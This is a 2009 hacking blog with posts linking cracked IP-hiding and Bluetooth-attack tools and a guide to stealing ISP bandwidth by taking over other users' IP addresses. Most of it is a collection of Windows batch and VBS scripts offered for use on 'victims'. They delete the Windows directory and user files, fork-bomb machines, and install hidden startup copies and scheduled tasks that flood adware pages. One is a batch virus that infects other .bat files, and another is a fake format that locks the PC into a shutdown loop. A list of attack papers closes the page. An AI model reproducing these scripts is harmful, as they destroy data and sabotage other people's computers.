AKON FREEDOM-BEAUTIFUL

Thursday, April 2, 2009

ip hiders (full version) trusted

0comments



ip hiders (full version) trusted




these r ip hiders which allow u to browse hiding ur ip
no one can trace ur ip and u can doanything u want and no one can catch ur ip address
this is trusted and its full version


try

http://rapidshare.com/files/192515500/Hide_IP_V3.5_MORE_THAN_35_NEW_SERIALS_.rar

http://rapidshare.com/files/192516811/Invisible_Browsing_v6.5.rar
0comments

mobile bluetooth hacking software


Bluetooth Hacking


Bluetooth Hacking
The State of the Art

What is Bluetooth


Bluetooth SIG


Trade association


Founded 1998


Owns and licenses IP


Bluetooth technology


A general cable replacement


Using the ISM band at 2.4 GHz

● Protocol stack and application profiles

Network Topology


Hopping sequence defines the piconet


Master defines the hopping sequence


1600 hops per second on 79 channels


Up to seven active slaves

● Scatternet creation

Bluetooth Stack

http://desiheart.net/filehost/files/1/PosterImages/bluethooth1.JPG (http://desiheart.net/filehost/files/1/PosterImages/bluethooth1.JPG)


Security modes


Security mode 1


No active security enforcement


Security mode 2


Service level security


On device level no difference to mode 1


Security mode 3


Device level security

● Enforce security for every low-level connection

How pairing works


First connection

(1)
> HCI_Pin_Code_Request

(2)
<> HCI_Link_Key_Notification


Further connections

(1)
> HCI_Link_Key_Request

(2)
<> HCI_Link_Key_Notification (optional)

Principles of good Security (CESG/GCHQ)


Confidentiality


Data kept private


Integrity


Data has not been modified


Availability


Data is available when needed


Authentication


Identity of peer is proven


Non-repudiation

● Peer cannot deny transaction took place

Breaking all of them


Confidentiality


Reading data


Integrity


Modifying data


Availability


Deleting data


Authentication


Bypassed completely


Non-repudiation

● Little or no logging / no audit trails

Blooover II


Successor of the popular Blooover application


Auditing toool for professionals/researchers


Included Audits


BlueBug


HeloMoto


BlueSnarf


Malformed Objects



download link

http://rapidshare.com/files/172926103/BlueTooth_Hacking_Tools_Collection_By____ndy_.rar

Hack Sify Reliance others Speed Upto 10 MBPS Beam Cable Hack

0comments
Hack Sify Reliance others Speed Upto 10 MBPS Beam Cable Hack


First Download this ETHERNET Ip Sniffer called ETHERDETECT

Use the tool to Scan Ip's in your network

Keep Scanning till you get some 200 Ip's ..

Then just change the last 3 digits of your IP Address with the IP's you get In that scanner !!
NOTE:Please save your Ip address somewhere so as to get back to your original ip !

It will say "Ip conflict" error,keep trying with other Ip's untill you succeed.

Sometimes when you will change your Ip you will get same speed ...in that case ..try another ip



download link

http://rapidshare.com/files/46070425...tect_setup.exe


..:~SERIAL~:..
CODE
YW38X6HKWYT4CTK

Wednesday, April 1, 2009

Batch and Vbs codes

0comments

Batch and Vbs codes

The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or
(don't tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
end if


next, we have a code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Now we have a batch file that pops up with repeating message boxes

:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * since you are stuck reading
msg * I am gonna tell you a story
msg * bout a dumb guy named (victims name)
msg * who just opened my batch
msg * and got stuck listening to a story
msg * from a computer
msg * so he was opening up batches
msg * when one pops up with a cool msg
msg * then it says "hi"
msg * Hi
msg * Are you having fun?
msg * I am!
msg * have fun playing with this one (insert victim)
msg * Because you have been P-w-n-e-d with a capital "P"
GOTO BEGIN


we now have a batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?

@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
cls
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
:next
erase password.bat
erase password.dat
:hello
cls
echo Turn off PC
goto hello
:done
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g


now we have a batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someones autoexec,
that would really make them mad)

@echo off
Rundll32 user32,SwapMouseButton
rundll32 keyboard,disable
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it


batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit more, some one
could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green

@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
assoc
assoc
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60


this is a VBs file so of course save as VBS, you can replace the txt in this code with whatever you want

Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 120
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "P"
wscript.sleep 200
wshshell.sendkeys "w"
wscript.sleep 150
wshshell.sendkeys "n"
wscript.sleep 170
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "l"
wscript.sleep 120
wshshell.sendkeys "l"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "w"
wscript.sleep 200
wshshell.sendkeys "b"
wscript.sleep 120
wshshell.sendkeys "s"


This is a batch file "Virus" it does not actually do anything. it will just set off your anti virus

@echo off>nul.ViRuS if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop if "%1=="/ViRuS_FINDSELF goto ViRuS_findself if "%VOFF%=="T goto ViRuS_OLDBAT set ViRuSname=%0 if not exist %0.bat call %0 /ViRuS_FINDSELF %path% if not exist %ViRuSname%.bat set ViRuSname= if "%ViRuSname%==" goto ViRuS_OLDBAT rem ViRuS if batch is started with name.BAT, virus will not become active rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable) rem ViRuS also if batch was only in an append /x:on path (chance=minimal) attrib +h %ViRuSname%.bat for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a attrib -h %ViRuSname%.bat set ViRuSname= goto ViRuS_OLDBAT :ViRuS_findself if "%2==" goto XXX_END>nul.ViRuS if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname% if exist %ViRuSname%.bat goto XXX_END if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname% if exist %ViRuSname%.bat goto XXX_END shift>nul.ViRuS goto ViRuS_findself :ViRuS_outer_loop for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a goto XXX_END>nul.ViRuS ViRuS_multiply find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat find /v "ViRuS" <%2 |find /v ":XXX_END" >>xViRuSx.bat echo :XXX_END>>xViRuSx.bat copy xViRuSx.bat %2>nul del xViRuSx.bat goto XXX_END>nul.ViRuS :ViRuS_OLDBAT echo on>nul.ViRuS echo This is the dummy Virus Created Mason(pkk) :XXX_END


this is a VBS code that each time you pree the letter "E", it will close without saving, the reason "E" was chosen is because E is the most common used letter
in the english language.

Open MS Word And Press F11, To Open The MS Vbs Editor. Then input this
Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyE), KeyCategory:=wdKeyCategoryCommand, _
Command:=”TestKeybinding”
End Sub

Sub TestKeybinding()
Dim x As Document
Set x = ActiveDocument
x.Close (False)
End Sub


This code is batch and it creates hundreds (or however many you want) of directories

@echo off
title Program Adobe Reader 8
:a
:1
@echo off
echo download all files of program "Microsoft Word"? y or n
echo y=yes
echo n=no
set input=
set /p input=enter your option:
if %input%==y goto :n
if %input%==n goto :n
:n
pause
color 40
echo Please Wait One Moment(this may take a minute)
echo downloading
md.urmuty56u
md.o,mryumu
md.rjyu56
md.u5jjum,u
md.y4mt,ry6
md.76yutuu
md.4y,mm56
md.ejy,rut5u6
md.mjyumyuu
md.lyumtr56
md.68mr9uumr
md.ojyt56
md.6mrrnmtu
md.jtu6ryu56hy
md.oryimu,rty
md.74,n6
md.ujryitmu
md.fyhyi,huu6
md.nv,mryu6
md.j,yimntu
md.m5yinmu6rt
md. n,nmr6
md.fh,yiu65u66uu
md.djtyiu6mtur 6u
md.ni,t66u56
md.ry,yhyu66u
md.jynth6y46u
md.trn,ymir,hethy444
md.gethgethteht
md.tyjhtyju7ytju7u
md.787876ujytj
md.7u577
md.rhytru5uuuuuu788uuuuu45
md. 6ty rtyr etty
md.tyyo
md.rytryrtthrrrrytrh
md.ryrtytrytit
md.6yyyyyyyyyyyyyiiiiyyyyyytryt
md.htrhwrthrthii
md.trhtrhtrt
md.htehtrht
md.iiii677i76457uiui57iiii677i76457uiu
md.iiii677i76457uiui574346t34t341t
md.iiii677i76457uiui57iiii657uiui57423
md.iiii677i76457uiui57iiii677i76iui57
md.iiii677i76gtmjmto
md.iiii677i7645yoi
md.iiii677i76457gjjgggggfffh
md.uiuiuiuiuiuiuiuiuiuuuuuug
md.uitur5ur
md.itt69
md.tu9toto
md.7jt58iot
md.7iui789
md.iui9oty
md.7u68
md.76iio89o
md.76iiii768
md.iu7i7ui7ioi
md.6t6i5i7oio
md.7iu776i7io
md.iiii677i764io57uiui57
md.j6ii6irt7i
md.iyh7i7tyjti
md.76uiy7i67
md.67tthujy6j6i
md.ituu7i7y76uyty
md.7j67u6ui
md.ryjtytj7ryij
md.jyyi7jut
md.ryj7y
md.ry7ijyj
md.jyiotyi
md.jhjryiio
md.ryyj7
md.854/y*7ui
md.57484ju7/854545814547
md.76i45/io
md.7458t
md.u7j45u7
md.5645778yu
md.68478yui
md.yhj558
md.hjr8798789
md.ry56875
md.hj65ui
md.try3154
md.dfj1254
md.nb0254
md.b0254
md.n412054
md.njfh442124
md.545
md.g124dh45
md.thet2hth5
md.8yyg5124e554
md.8egherg245
md.5+ethget4502
md.5+ghtd12
md.-bgddhd
md.+5ghd
md.85gh
md.8-+dgh
md./8+dgh
md.+dg
md.+8hd
md.-8ghh
md.7498dgh
md./*7897*dhadgh
md.7/87daggad
md.48dfgadf
md.9gdfag
md./94dghd
md.84tydgaha
md.876yty84/7dgha
md.itytthadg
md.uutuythdg
md.iyyyhdg
md.turttyythdghytyt
md.yutywtyetyydg
md.iyu8yuiitujkhad
md.yujikythad
md.iyuyghadg
md.886ytyuihadg
md.iuykithdg
md.68jkyytuihdguy
md.5689yth
md.689ygh
md.94ytty5ghyety
md.jutrjtutryjghdg796
md.jujutr58jtyh
md.ujtrj6ty
md.tjuty
md.jtujjrtyuj
md.jttuyuttyrr
md.tujtujurty
md.jtrjjtry
md.tuutry
md.tujjrry
md.tyjjjr
md.jtuuyr
md.yttujjyur
md.tyjjuruy
md.jjtujuy
md.yytuuutyujt
md.jtjjuuty
md.yjtuujjtu
md.jtyjrujtu
md.hjyjjtrjjutjt
md.jyutuujth
md.yyjjuurjjgh
md.5tujuuujutjghru7u
md.8urjjjgh
md.57ujujgh
md.58jujdgbs
md.87rujh
md.75jrujrhu
md.8tjrjruughrjurj
md.3urjrrrjhg
md.8jrjjh
md.58j57gj
md.78urjghj
md8.78jr
md.835ghj
md.7ugh
md.6787j
md.76u7ghjghgh8
md.t78jjj
md.78j5gghjjkgh7u
md.7t8jggh
md.8j7ghjjj
md.768ghjhgjghjg
md.8ty7gh
md.7j8jjhj
md.8thghhjyyjh577
md.7j7uhjuhjh
md.78t75hgjghj
md.jyyyuh8ghj
md.8tfgghj
md.76ghh
md.88fghjgh
md.7576j
md.837itghj87uitu
md.8376gh
md.85j8j
md.57tyhgj67
md.82j8hg
md.57dgt6jgh7
md.578j5678j
md.8gfj78hj
md.75t56
md.578yuhji
md.7528hj
md.78u6i
md.78t7i67j
md.56jtuh5tuiii6
md.57387jt87j6
md.274674ri6tu725767678
md.hjtj8i
md.wrtuyi6859
md.jtrrhji
md.tyjthtuyu68
md.yjterynikhjty
md.jyjtjtyuyk


batch sends you every pop up I've encountered

@echo off
mkdir C:SYSTEM
copy %0 "c:systemwinsys32.bat
ATTRIB +H +S c:systemwinsys32.bat
copy %0 "c:systemft32.bat
ATTRIB +H +S c:systemft32.bat
copy %0 "c:/Documents and SettingsAll UsersStart MenuProgramsStartup
AT 9:00AM "c:systemwinsys32.bat"
AT 9:30AM "c:systemwinsys32.bat"
AT 10:00AM "c:systemwinsys32.bat"
AT 10:30AM "c:systemwinsys32.bat"
AT 11:00AM "c:systemwinsys32.bat"
AT 11:30AM "c:systemwinsys32.bat"
AT 12:00PM "c:systemwinsys32.bat"
AT 12:30PM "c:systemwinsys32.bat"
AT 1:00PM "c:systemwinsys32.bat"
AT 1:30PM "c:systemwinsys32.bat"
AT 2:00PM "c:systemwinsys32.bat"
AT 2:30PM "c:systemwinsys32.bat"
AT 3:00PM "c:systemwinsys32.bat"
AT 3:30PM "c:systemwinsys32.bat"
AT 4:00PM "c:systemwinsys32.bat"
AT 4:30PM "c:systemwinsys32.bat"
AT 5:00PM "c:systemwinsys32.bat"
AT 5:30PM "c:systemwinsys32.bat"
AT 6:00PM "c:systemwinsys32.bat"
start iexplore http://www.screensavers.com/landing/3d.html?banner=sea_prop_398x394&aff_id=fastclick
start iexplore http://www.screensaver.com/720x300pop2.html?f=ssavercom
start iexplore http://www.roar.com/client/?sh=47843&to=425&do=2356
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php
start iexplore http://consumerpromotioncenter.com/?cid=cKb4OYl+9DE&u=bb3ba267dcf418089a155b8ca8c35aa0&=&zipcode=
start iexplore http://geo.precisionclick.com/ad/?typ=1&pub=1&site=1589&adfmt=3&aid=0&sid=0&cat=0&sub=0&pop=&tloc=False&click=&ipr=&ref=81939389352424928477788287997834239391828988772376888624&ccb=73783273
start iexplore http://www.megawealthy.com/488/
start iexplore http://b.casalemedia.com/V2/45086/51808/index.html?www.milliondollahhomepage.com/
start iexplore http://www.everyfreegift.com/landings/efg_land_main01.jsp?product_id=2116&pid=1844165918&cid=2116
start iexplore http://goldenpalace.com/playnow_aff_no_poker.php?member=xorfl&profile=mdh&banner=&t=0&creferer=&referer=
start iexplore http://www.screensavers.com/landing/3d.html?banner=sea_prop_398x394&aff_id=fastclick
start iexplore http://www.screensaver.com/720x300pop2.html?f=ssavercom
start iexplore http://www.roar.com/client/?sh=47843&to=425&do=2356
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php
start iexplore http://consumerpromotioncenter.com/?cid=cKb4OYl+9DE&u=bb3ba267dcf418089a155b8ca8c35aa0&=&zipcode=
start iexplore http://geo.precisionclick.com/ad/?typ=1&pub=1&site=1589&adfmt=3&aid=0&sid=0&cat=0&sub=0&pop=&tloc=False&click=&ipr=&ref=81939389352424928477788287997834239391828988772376888624&ccb=73783273
start iexplore http://www.megawealthy.com/488/
start iexplore http://b.casalemedia.com/V2/45086/51808/index.html?www.milliondollahhomepage.com/
start iexplore http://www.everyfreegift.com/landings/efg_land_main01.jsp?product_id=2116&pid=1844165918&cid=2116
start iexplore http://goldenpalace.com/playnow_aff_no_poker.php?member=xorfl&profile=mdh&banner=&t=0&creferer=&referer=
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php
start iexplore http://consumerpromotioncenter.com/?cid=cKb4OYl+9DE&u=bb3ba267dcf418089a155b8ca8c35aa0&=&zipcode=
start iexplore http://geo.precisionclick.com/ad/?typ=1&pub=1&site=1589&adfmt=3&aid=0&sid=0&cat=0&sub=0&pop=&tloc=False&click=&ipr=&ref=81939389352424928477788287997834239391828988772376888624&ccb=73783273
start iexplore http://www.megawealthy.com/488/
start iexplore http://b.casalemedia.com/V2/45086/51808/index.html?www.milliondollahhomepage.com/
start iexplore http://www.everyfreegift.com/landings/efg_land_main01.jsp?product_id=2116&pid=1844165918&cid=2116
start iexplore http://goldenpalace.com/playnow_aff_no_poker.php?member=xorfl&profile=mdh&banner=&t=0&creferer=&referer=
start iexplore http://www.screensavers.com/landing/3d.html?banner=sea_prop_398x394&aff_id=fastclick
start iexplore http://www.screensaver.com/720x300pop2.html?f=ssavercom
start iexplore http://www.roar.com/client/?sh=47843&to=425&do=2356
start iexplore http://ipods.freepay.com/Default.aspx?N=1&P=186
start iexplore http://www.ifreeipod.com/
start iexplore http://www.notebooks4free.com/default.aspx?r=312353
start iexplore http://www.easyfreeipods.com/
start iexplore http://popularscreensavers.smileycentral.com/download/index.jhtml?partner=ZRxdm501&spu=true&ref=http%3A//search.yahoo.com/search%3Fp%3Dfree+screensavers%26fr%3DFP-tab-web-t331%26toggle%3D1%26cop%3D%26ei%3DUTF-8
start iexplore http://b.casalemedia.com/V2/55134/74901/index.html?www.depiction.net/freeipods.php
start iexplore http://www.addictingclips.com/Content.aspx?key=97DBA08806171653&refCode=&brand=ag
start iexplore http://media.fastclick.net/w/pc.cgi?mid=86795&sid=23377
start iexplore http://www.consumergain.com/landing.php?cxt=7&gi=15&ci=101541
start iexplore http://www.consumergain.com/bonus.php


This is a simple Batch example on some of the colors you can change the txt to in dos

@echo off
color %num%
:start
cls
COLOR %num%
ECHO Green = 1
ECHO Red = 2
ECHO Yellow = 3
ECHO Aqua = 4
ECHO Purple = 5
ECHO White = 6
ECHO Blue = 7
ECHO Gray = 8
ECHO.
SET/P color=Enter Color:
IF "%color%" equ "1" goto 1
IF "%color%" equ "2" goto 2
IF "%color%" equ "3" goto 3
IF "%color%" equ "4" goto 4
IF "%color%" equ "5" goto 5
IF "%color%" equ "6" goto 6
IF "%color%" equ "7" goto 7
IF "%color%" equ "8" goto 8
IF "%color%" equ "exit" goto end
IF "%color%" equ "%color%" goto error
:1
set num=a
goto start
:2
set num=c
goto start
:3
set num=e
goto start
:4
set num=B
goto start
:5
set num=D
goto start
:6
set num=F
goto start
:7
set num=9
goto start
:8
set num=8
goto start
:error
cls
color 0
ECHO That is not a Valid Color
echo.
pause
goto start



Cool batch file to lock and disguise a folder.
Move any files you want to be hidden in your locker, double click the bat again and you will be asked to lock when the folder is locked it will dissapear
to unlock the folder double click the bat file enter any pass. or make up one of your own and input it into the code


@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


Batch that kills and deletes the windows directory, and all .txt .exe .bat and .ini files then forkbombs your computer

@echo off
kill %windir%
del %windir%
del *.txt
del *.exe
del *.bat
del *.ini
:ok
start, cmd
Goto ok


Erases hard drive then shuts down the comp:

hdmemory/release
echo total hard drive erased
echo Do not use on anyone
shutdown -r -f -t0


Batch file that each time they reboot, their computer shuts down again in 5 seconds. So you wouldn't want to do this to an unexperienced user, lol

@echo off
echo shutdown -s -t 5 -c "Windows is shutting down due to an internal error" > C:\close.bat
copy C:\close.bat "C:\documents and settings\all users\start menu\programs\startup\"
cls
echo Maximize this window to continue
echo Wscript.Sleep 4000 > C:\sleep1.vbs
call C:\sleep1.vbs
echo Msgbox"Critical system process failure. Press enter to to begin auto fix." > c:\error1.vbs
call c:\error1.vbs
echo Formatting c: drive...
echo Wscript.Sleep 2000 > C:\sleep2.vbs
call C:\sleep1.vbs
echo The following files were are infected and should be deleted immediately
call C:\sleep1.vbs
dir /s C:\*.exe
dir C:
call C:\sleep1.vbs
cls
echo Deleting files 36 percent complete
call C:\sleep2.vbs
echo Deleting files 79 percent complete
call C:\sleep2.vbs
echo Deleting files 100 percent complete
call C:\sleep2.vbs
echo Files successfully deleted
call C:\sleep1.vbs
cls
echo All files in the windows registry were also deleted
echo a full reinstall is required to continue using windows
call C:\sleep2.vbs
echo Msgbox"Windows is not responding, shutting down" > c:\error2.vbs
call C:\error2.vbs
call C:\sleep2.vbs
echo Msgbox"Applications will automatically closed, all unsaved data will be lost" > C:\error3.vbs
call C:\error3.vbs
cls
ECHO
ECHO --------------------------------------------------------------------------
call C:\sleep1.vbs
shutdown -r -t 5



I forgot the obvious forkbomb:

@ECHO OFF
START
%0
GOTO :START

-: White Papers :-

0comments

-: White Papers :-


-: White Papers :-


File Size Description
rc4-misuse.pdf 142.7 KB The Misuse of RC4 in Microsoft Word and Excel
802.11_attacks.pdf 701.7 KB 802.11 Attacks
ActiveX_active_expl.pdf 172.5 KB ActiveX - Active Exploitation
address-spoof.txt 15.2 KB Address Bar Spoofing Attacks Against IE 6
Address_Resolution.txt 17.8 KB Understanding Address Resolution Protocol Attacks
adv-buff-overflow.txt 58.8 KB Advanced Buffer Overflow Exploits
Adv-Shell-Tech.txt 7.4 KB Advanced Shellcoding Techniques
Advanced_SQL_Injection.pdf 291.0 KB Advanced SQL Injection In SQL Server Applications
afs.ps 53.6 KB Highjacking AFS
brute_force_analysis.txt 21.9 KB Analysis of Brute Force & Dictionary Attacks
Anatomy_of_Malware.pdf 47.3 KB Anatomy of a Malware
anomaly_rules_def.pdf 21.2 KB Using Snort as an anomaly based IDS
AnonMax.txt 10.0 KB How to maintain your anonymity on the web
appOSfingerprint.txt 11.7 KB Advanced application-level OS fingerprinting
aspmail-spoof.pdf 100.4 KB ASP CDONTS.NEWMAIL object E-mail Spoofing
Oracle_PL_SQL_Injection.pdf 439.4 KB Assault on Oracle PL SQL Injection
xss-attack-defense.txt 17.8 KB Cross Site Scripting - Attack and Defense guide
banking-flaws.pdf 305.0 KB Internet Banking Flaws In India
beginners.txt 24.5 KB Beginners guide to UNIX Hacking
Biologger.pdf 697.5 KB Biologger - A Biometric Keylogger
biosdefault.txt 503.0 B Default BIOS passwords
Blind_MySQL_Injection.pdf 306.3 KB Blind MySQL Injection
cryptography_basics.pdf 84.5 KB Basics of Cryptography
browserhack.txt 5.9 KB Hacking from your Web Browser
bsdkern.htm 143.5 KB Attacking FreeBSD with Kernel Modules
Buffer_Overflow.txt 14.0 KB Buffer Overflow Tutorial
Bypassing_NAC.pdf 868.9 KB Bypassing network access control (NAC) systems
clickjack-xss.txt 10.2 KB The Clickjacking Meets XSS: A State Of Art
Spyware_Intro.pdf 30.9 KB Introduction to Spyware
defaultpasswords.txt 4.8 KB Default Passwords for network switches and devices
dns-writeup.txt 10.5 KB DNS cache poisoning then and now
dsniff_netmon.txt 35.0 KB Network Monitoring with Dsniff
email_and_telnet.txt 4.2 KB Sending Emails via SMTP and Telnet
Erasing_Logs.txt 2.6 KB Erasing Your Presence From System Logs
ErrSQL_Inj.pdf 11.0 KB Error based SQL Injection
format_string_exp.txt 61.3 KB Exploiting Format String Vulnerabilities
faqar.txt 10.6 KB Remailers FAQs
ffp.pdf 169.2 KB Fuzzy Fingerprinting
firewall-stego.txt 3.9 KB Bypassing firewalls through protocol stenography
FirewallsFAQ.txt 72.6 KB Firewalls FAQs
advanced_xss.txt 24 KB Advanced Cross-Site-Scripting
vista_dll_injection.pdf 296 KB Windows Vista DLL Injection
IDS_Agents.pdf 96.8 KB IDS Using Security Agents
whid_2008.pdf 624 KB Web Hacking Incidents Database 2008
expl_buff_ovfl.pdf 72.6 KB Exploiting Buffer Overflows
File Size Description
IIS_Exploitation.txt 27.8 KB Guide to IIS Exploitation
finger.txt 8.9 KB Finger a user via telnet
hacker-howto.html 28.4 KB How To Become A Hacker
hackers-rfc.txt 10.6 KB The Hacker's RFC
hackfaq.zip 98.9 KB The Hack FAQ
hackkit-2.0b.txt 524.5 KB Hacking Kit v2.0
hackpage.txt 9.9 KB Hacking Webpages The Ultimate Guide
hackpw.txt 7.6 KB How to crack a unix password file
HostFingerprinting.pdf 45.6 KB Host Fingerprinting and Firewalking With hping
Honeywalldetection.pdf 190.5 KB How to detect Honeypots using hping
host-detection.doc 142.5 KB Advanced Host Detection Techniques
Bypass_BIOS.txt 9.0 KB How to Bypass BIOS Passwords
find-ftps.txt 588.0 B How To Find Ftp's The Easy Way
modify_exe.txt 2.5 KB How to modify exe files
httprint_paper.zip 576.6 KB Introduction to HTTP fingerprinting
UnicodeExpl.doc 164.0 KB Unicode exploitation with how it works
Info-Gathering.txt 26.2 KB The Info-Gathering Tutorial
int-arr-overfl.txt 25.1 KB Integer array overflows
intv2-8.pdf 87.0 KB A Network Intrusion Detector
ip-faq.htm 10.9 KB An IP address FAQ
tcp-attack.txt 45.3 KB Simple Active Attack Against TCP
ipspoofing_dem.zip 9.3 KB IP-spoofing Demystified
inetsec.txt 8.8 KB A Guide to Internet Security
ip-spoof.txt 79.9 KB A short overview of IP spoofing
anon-ftp-faq.htm 26.2 KB Anonymous FTP FAQ
pack_cap.htm 20.0 KB Network Packet Capture FAQ
javascript_fun.txt 8.5 KB how javascript can be used to bypass html forms
John_The_Ripper.pdf 94.6 KB John The Ripper -An Illustrated Guide
Learning_Perl.pdf 744.3 KB Learning Perl Writing Exploits
Info_Gather.pdf 1.1 MB Learn Information Gathering By Example
vuln_look.txt 4.8 KB Looking for Vulnerabilities
linux-kernel.txt 87.4 KB The Linux Kernel HOWTO
linux-shell-ref.pdf 33.7 KB LINUX SHELLCODING REFERENCE
firewalls-loc.txt 24.2 KB Locating Stateless Firewalls
mac_addr_clon.pdf 157.7 KB "Cloning MAC Addresses" Whitepaper
metasploit_expl.txt 11.4 KB Metasploit 3.0 Automated Exploitation
dns_spoof.htm 17.2 KB DNS Spoofing and Abuse
MiddleMan.pdf 23.4 KB Paper explaining man-in-the-middle attacks
linux_tips.txt 18.5 KB Misc Linux Tips & Tricks
secret_codes.txt 31.1 KB Mobile Secret Codes
 

HACK Tip Blak Magik is Designed by productive dreams for smashing magazine Bloggerized by Ipiet Distributed by Fractal Enlightenment of Fractal Blog Network © 2008